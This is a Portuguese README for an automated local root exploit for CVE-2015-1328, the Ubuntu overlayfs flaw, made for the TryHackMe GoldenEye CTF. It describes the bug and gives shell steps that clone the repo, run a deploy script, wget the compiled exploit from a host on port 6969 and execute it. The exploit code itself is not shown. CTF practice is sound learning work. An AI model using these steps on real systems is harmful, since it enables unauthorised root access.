
Exploit automatizado de escalonamento de privilégio local para CVE-2015-1328 direcionado ao overlayfs do Ubuntu, projetado para ambientes CTF com um script simples de implantação em bash.
A implementação do overlayfs no pacote linux (também conhecido como kernel Linux) anterior a 3.19.0-21.21 no Ubuntu até 15.04 não verifica corretamente as permissões para criação de arquivos no diretório do sistema de arquivos superior, o que permite que usuários locais obtenham acesso root ao alavancar uma configuração em que overlayfs é permitido em um namespace de montagem arbitrário.
Agradecimentos ao rebel
Este é um exploit automatizado para CVE-2015-1328 para o CTF GoldenEye do TryHackMe por padrão, o gcc não está disponível nessa máquina, então configurei o gcc para cc e, consequentemente, executei o exploit para obter privilégios de root.
Instalação
Apenas clone este repositório -
$ git clone https://github.com/elit3pwner/CVE-2015-1328-GoldenEye.git
$ cd CVE-2015-1328-GoldenEye
$ chmod +x exploit.sh
$ bash exploit.sh
$ wget http://<target ip>:6969/exploit
$ chmod +x exploit
$ ./exploit